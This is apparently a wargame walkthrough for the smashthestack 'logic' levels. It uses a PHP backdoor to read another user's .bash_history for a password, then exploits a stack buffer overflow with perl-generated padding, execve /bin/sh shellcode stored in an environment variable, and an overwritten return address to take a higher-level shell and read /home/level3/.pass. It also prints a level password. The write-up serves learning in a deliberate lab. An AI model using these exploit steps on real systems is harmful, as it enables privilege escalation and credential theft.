PHP backdoor(level1):
http://logic.smashthestack.org:8181/uploads/PHPJackal.php
Execute cat /home/level1/.bash_history and find password inside.
There's a executable in /levels/level2/level2
Find the password via strings ./level2, it's fsckmelogic.
Through this password, calling ./level2 fsckmelogic XXXX to exploit
till the buffer overflow.
Smash the stack with gdb ./level2, and use:
run fsckmelogic $(perl -e '"A"x4200')
We'll get the stack's already smashed with As since it shows the
returning address 0x41414141 is not valid.
Then we have to find in which four bytes(in a 32-bit machine), represents that address. We use binary search:
run fsckmelogic $(perl -e '"A"x4100 . "B"x100')
run fsckmelogic $(perl -e '"A"x4150 . "B"x50')
run fsckmelogic $(perl -e '"A"x4125 . "B"x75')
run fsckmelogic $(perl -e '"A"x4115 . "B"x85')
run fsckmelogic $(perl -e '"A"x4110 . "B"x90')
This time we see the address changed to 0x42424141, there we go:
run fsckmelogic $(perl -e '"A"x4108 . "B"x4')
The address returned is what we want: 0x42424242.
Then we'd get a shellcode, that should be the effective part of the following program:
void main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
Here I have existing one, from http://insecure.org/stf/smashstack.html :
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
store it into a global accessible position, such as an env variable:
export SHELLCODE=$'\xeb\x1f\x5e\x89\x76...'
Then we should get the address of that variable:
main()
{
printf("%#x\n", getenv("SHELLCODE"));
}
It outputs something like: 0xbfffdc75
Then we subst this address of our hijack code into the returning
address of ./level2 executable.
That is:
run fsckmelogic $(perl -e '"A"x4108 . "\x75\xdc\xff\xbf"')
Then we'll see a shell we got. Try to id it, and we see we have
granted identity of user level3. cat /home/level3/.pass to peek
password.